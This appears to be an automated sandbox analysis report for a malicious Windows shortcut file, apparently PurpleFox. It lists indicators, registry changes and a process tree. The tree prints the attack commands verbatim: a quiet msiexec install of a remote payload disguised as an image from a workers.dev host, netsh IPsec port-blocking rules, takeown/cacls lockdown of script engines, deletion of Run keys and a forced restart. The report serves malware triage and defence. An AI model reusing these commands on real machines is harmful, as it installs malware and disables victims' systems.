Analysis
-
max time kernel
143s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 13:58
Static task
static1
Behavioral task
behavioral1
Sample
11468a727bd8298fc93e1651400e437def16158c93e0c6cdc239df72fc16df03_JC.lnk
Resource
win7-20230831-en
General
-
Target
11468a727bd8298fc93e1651400e437def16158c93e0c6cdc239df72fc16df03_JC.lnk
-
Size
1KB
-
MD5
1370c8b810befea6651d6e60dee0b591
-
SHA1
7bbd08152f5eb10c199904e646ddd672e138e456
-
SHA256
11468a727bd8298fc93e1651400e437def16158c93e0c6cdc239df72fc16df03
-
SHA512
d6316cfb95c1205982ac4b0c20986a207132a89f4ab5bfd8eb20ba1e2b8eaf57e45d63dbb3d97100b390786fc911aa197ad9f7fb2f9eef779eb5e62297be606b
Malware Config
Signatures
-
resource yara_rule behavioral2/files/0x00080000000231ff-4.dat purplefox_msi -
Blocklisted process makes network request 1 IoCs
flow pid Process 17 4392 msiexec.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 5 IoCs
pid Process 2232 MsiExec.exe 2232 MsiExec.exe 2232 MsiExec.exe 2232 MsiExec.exe 2232 MsiExec.exe -
Modifies file permissions 1 TTPs 6 IoCs
pid Process 732 takeown.exe 4616 takeown.exe 4696 takeown.exe 3532 takeown.exe 4148 takeown.exe 4040 takeown.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2216 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Drops file in Windows directory 12 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI8A70.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8ABF.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8C0A.tmp msiexec.exe File created C:\Windows\.xml msiexec.exe File opened for modification C:\Windows\Installer\MSI8414.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI86F4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI89C3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8AFF.tmp msiexec.exe File created C:\Windows\dbcode86mk.log msiexec.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4504 sc.exe 4900 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 51 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4392 msiexec.exe 4392 msiexec.exe 2300 powershell.exe 2300 powershell.exe 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 59 IoCs
description pid Process Token: SeShutdownPrivilege 2216 msiexec.exe Token: SeIncreaseQuotaPrivilege 2216 msiexec.exe Token: SeSecurityPrivilege 4392 msiexec.exe Token: SeCreateTokenPrivilege 2216 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2216 msiexec.exe Token: SeLockMemoryPrivilege 2216 msiexec.exe Token: SeIncreaseQuotaPrivilege 2216 msiexec.exe Token: SeMachineAccountPrivilege 2216 msiexec.exe Token: SeTcbPrivilege 2216 msiexec.exe Token: SeSecurityPrivilege 2216 msiexec.exe Token: SeTakeOwnershipPrivilege 2216 msiexec.exe Token: SeLoadDriverPrivilege 2216 msiexec.exe Token: SeSystemProfilePrivilege 2216 msiexec.exe Token: SeSystemtimePrivilege 2216 msiexec.exe Token: SeProfSingleProcessPrivilege 2216 msiexec.exe Token: SeIncBasePriorityPrivilege 2216 msiexec.exe Token: SeCreatePagefilePrivilege 2216 msiexec.exe Token: SeCreatePermanentPrivilege 2216 msiexec.exe Token: SeBackupPrivilege 2216 msiexec.exe Token: SeRestorePrivilege 2216 msiexec.exe Token: SeShutdownPrivilege 2216 msiexec.exe Token: SeDebugPrivilege 2216 msiexec.exe Token: SeAuditPrivilege 2216 msiexec.exe Token: SeSystemEnvironmentPrivilege 2216 msiexec.exe Token: SeChangeNotifyPrivilege 2216 msiexec.exe Token: SeRemoteShutdownPrivilege 2216 msiexec.exe Token: SeUndockPrivilege 2216 msiexec.exe Token: SeSyncAgentPrivilege 2216 msiexec.exe Token: SeEnableDelegationPrivilege 2216 msiexec.exe Token: SeManageVolumePrivilege 2216 msiexec.exe Token: SeImpersonatePrivilege 2216 msiexec.exe Token: SeCreateGlobalPrivilege 2216 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeShutdownPrivilege 3504 powercfg.exe Token: SeCreatePagefilePrivilege 3504 powercfg.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeTakeOwnershipPrivilege 3532 takeown.exe Token: SeTakeOwnershipPrivilege 4148 takeown.exe Token: SeTakeOwnershipPrivilege 4040 takeown.exe Token: SeTakeOwnershipPrivilege 732 takeown.exe Token: SeTakeOwnershipPrivilege 4616 takeown.exe Token: SeTakeOwnershipPrivilege 4696 takeown.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe Token: SeRestorePrivilege 4392 msiexec.exe Token: SeTakeOwnershipPrivilege 4392 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3848 wrote to memory of 2216 3848 cmd.exe 87 PID 3848 wrote to memory of 2216 3848 cmd.exe 87 PID 4392 wrote to memory of 2232 4392 msiexec.exe 90 PID 4392 wrote to memory of 2232 4392 msiexec.exe 90 PID 4392 wrote to memory of 2232 4392 msiexec.exe 90 PID 4392 wrote to memory of 1532 4392 msiexec.exe 94 PID 4392 wrote to memory of 1532 4392 msiexec.exe 94 PID 4392 wrote to memory of 1532 4392 msiexec.exe 94 PID 1532 wrote to memory of 3504 1532 MsiExec.exe 96 PID 1532 wrote to memory of 3504 1532 MsiExec.exe 96 PID 1532 wrote to memory of 3504 1532 MsiExec.exe 96 PID 1532 wrote to memory of 2300 1532 MsiExec.exe 99 PID 1532 wrote to memory of 2300 1532 MsiExec.exe 99 PID 1532 wrote to memory of 2300 1532 MsiExec.exe 99 PID 1532 wrote to memory of 988 1532 MsiExec.exe 101 PID 1532 wrote to memory of 988 1532 MsiExec.exe 101 PID 1532 wrote to memory of 988 1532 MsiExec.exe 101 PID 1532 wrote to memory of 348 1532 MsiExec.exe 104 PID 1532 wrote to memory of 348 1532 MsiExec.exe 104 PID 1532 wrote to memory of 348 1532 MsiExec.exe 104 PID 1532 wrote to memory of 3904 1532 MsiExec.exe 106 PID 1532 wrote to memory of 3904 1532 MsiExec.exe 106 PID 1532 wrote to memory of 3904 1532 MsiExec.exe 106 PID 1532 wrote to memory of 3568 1532 MsiExec.exe 108 PID 1532 wrote to memory of 3568 1532 MsiExec.exe 108 PID 1532 wrote to memory of 3568 1532 MsiExec.exe 108 PID 1532 wrote to memory of 1864 1532 MsiExec.exe 111 PID 1532 wrote to memory of 1864 1532 MsiExec.exe 111 PID 1532 wrote to memory of 1864 1532 MsiExec.exe 111 PID 1532 wrote to memory of 4240 1532 MsiExec.exe 113 PID 1532 wrote to memory of 4240 1532 MsiExec.exe 113 PID 1532 wrote to memory of 4240 1532 MsiExec.exe 113 PID 1532 wrote to memory of 2920 1532 MsiExec.exe 115 PID 1532 wrote to memory of 2920 1532 MsiExec.exe 115 PID 1532 wrote to memory of 2920 1532 MsiExec.exe 115 PID 1532 wrote to memory of 4732 1532 MsiExec.exe 117 PID 1532 wrote to memory of 4732 1532 MsiExec.exe 117 PID 1532 wrote to memory of 4732 1532 MsiExec.exe 117 PID 1532 wrote to memory of 4436 1532 MsiExec.exe 119 PID 1532 wrote to memory of 4436 1532 MsiExec.exe 119 PID 1532 wrote to memory of 4436 1532 MsiExec.exe 119 PID 1532 wrote to memory of 1236 1532 MsiExec.exe 121 PID 1532 wrote to memory of 1236 1532 MsiExec.exe 121 PID 1532 wrote to memory of 1236 1532 MsiExec.exe 121 PID 1532 wrote to memory of 3408 1532 MsiExec.exe 123 PID 1532 wrote to memory of 3408 1532 MsiExec.exe 123 PID 1532 wrote to memory of 3408 1532 MsiExec.exe 123 PID 1532 wrote to memory of 3568 1532 MsiExec.exe 144 PID 1532 wrote to memory of 3568 1532 MsiExec.exe 144 PID 1532 wrote to memory of 3568 1532 MsiExec.exe 144 PID 1532 wrote to memory of 2156 1532 MsiExec.exe 129 PID 1532 wrote to memory of 2156 1532 MsiExec.exe 129 PID 1532 wrote to memory of 2156 1532 MsiExec.exe 129 PID 1532 wrote to memory of 2644 1532 MsiExec.exe 147 PID 1532 wrote to memory of 2644 1532 MsiExec.exe 147 PID 1532 wrote to memory of 2644 1532 MsiExec.exe 147 PID 1532 wrote to memory of 3504 1532 MsiExec.exe 133 PID 1532 wrote to memory of 3504 1532 MsiExec.exe 133 PID 1532 wrote to memory of 3504 1532 MsiExec.exe 133 PID 1532 wrote to memory of 4032 1532 MsiExec.exe 135 PID 1532 wrote to memory of 4032 1532 MsiExec.exe 135 PID 1532 wrote to memory of 4032 1532 MsiExec.exe 135 PID 1532 wrote to memory of 3232 1532 MsiExec.exe 137 PID 1532 wrote to memory of 3232 1532 MsiExec.exe 137
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\11468a727bd8298fc93e1651400e437def16158c93e0c6cdc239df72fc16df03_JC.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg /q2⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 72EB64ED1BE24ABE9068A2FE2608D3A12⤵
- Loads dropped DLL
PID:2232
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A0386E6905FE88349028A6811BB0585B E Global\MSI00002⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\powercfg.exe"C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye3⤵PID:988
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter13⤵PID:348
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP3⤵PID:3904
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP3⤵PID:3568
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP3⤵PID:1864
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP3⤵PID:4240
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP3⤵PID:2920
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP3⤵PID:4732
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP3⤵PID:4436
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP3⤵PID:1236
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP3⤵PID:3408
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP3⤵PID:3568
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP3⤵PID:2156
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP3⤵PID:2644
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP3⤵PID:3504
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP3⤵PID:4032
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP3⤵PID:3232
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP3⤵PID:3952
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP3⤵PID:1728
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block3⤵PID:3440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3568
-
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion13⤵PID:3768
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y3⤵PID:2644
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N3⤵PID:4112
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N3⤵PID:4556
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:732
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N3⤵PID:1728
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N3⤵PID:2692
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N3⤵PID:3984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f3⤵PID:3600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f3⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f3⤵PID:884
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" stop wmiApSrv3⤵
- Launches sc.exe
PID:4900
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled3⤵
- Launches sc.exe
PID:4504
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD54bc4ad70c3a48c1a0bc553e8616f3675
SHA1059df1c37078a17a778940d11a5df8d02bf26482
SHA256c4c258e5718f0bff3f4e02d207b4b2b744fee3f14d8d79d637b78029b2479d12
SHA51250e0d2b0ba17553cb9e3df8d19f34b52ca25e16f38b749fe7b3ca50de8d93988a168076b32e01862c9078ffe4c46a132949970212d5824daa6fb9609f67deeea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD5eb9a4cf233789b96f940be0186a26988
SHA1002a1cee740fa212732379d1f00dbcf7c0cccbf2
SHA25624d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8
SHA512725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
